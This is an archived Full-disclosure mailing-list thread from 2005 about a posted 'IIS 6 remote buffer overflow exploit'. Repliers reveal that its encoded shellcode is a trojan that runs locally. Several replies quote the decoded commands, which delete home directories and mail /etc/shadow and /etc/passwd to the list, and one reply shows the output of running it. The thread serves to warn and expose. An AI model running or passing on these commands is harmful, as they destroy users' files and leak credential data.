Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-23 Thread Christian Lete
Erm... you should have READ the code first and gotten to know what the shellcode does, instead of just compiling/running it (even as a non-root user)

Alonso / ReYDeS wrote:
> Greetings:
> Good attempt ;) But sometimes it works.
> ---
> cat: /etc/shadow: Permiso denegado
> No message, no subject; hope that's ok

RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-19 Thread David Li
Wait, you mean if I run that, I can hack IIS? ^_^

> Not that anyone would fall for running this on anything besides a test
> system, but to save 30 seconds to decode, what it really does (locally,
> not remotely) is:
>
> cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
> cat /etc/pas

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-19 Thread Paul Kurczaba
THIS ADVISORY IS FALSE!!!

"shellcode" is decoded to be:
    /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

"launcher" is decoded to be:
    cat /etc/shadow |mail full-disclosure@lists.grok.org.uk

"netcat_shell" is decoded to be:
    cat /etc/passwd |mail full-disclosure@lists.grok.org.uk

Day

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Ron
haha, nice:

    /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
    cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
    cat /etc/passwd |mail full-disclosure@lists.grok.org.uk

lol @ anybody who does it.

Day Jay wrote:
> /* Proof of concept code
> Please don't send us e-mails asking us "how to hack" beca

RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Lauro, John
Not that anyone would fall for running this on anything besides a test system, but to save 30 seconds to decode, what it really does (locally, not remotely) is:

    cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
    cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
    /bin/rm -rf /home/*;clear

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Pbt
On Monday 18 April 2005 at 16:53 -0700, Day Jay wrote:
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

You're right to add this warning! :)

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Alonso / ReYDeS
Greetings:

Good attempt ;) But sometimes it works.

---
cat: /etc/shadow: Permiso denegado
No message, no subject; hope that's ok
/bin/rm: no se puede borrar «/home/*»: Permiso denegado
/bin/rm: no se puede borrar «/home/**»: Permiso denegado
/bin/rm: no se puede borrar «/home/***»:

[Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Day Jay
/* Proof of concept code
   Please don't send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

   DISCLAIMER:
   !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer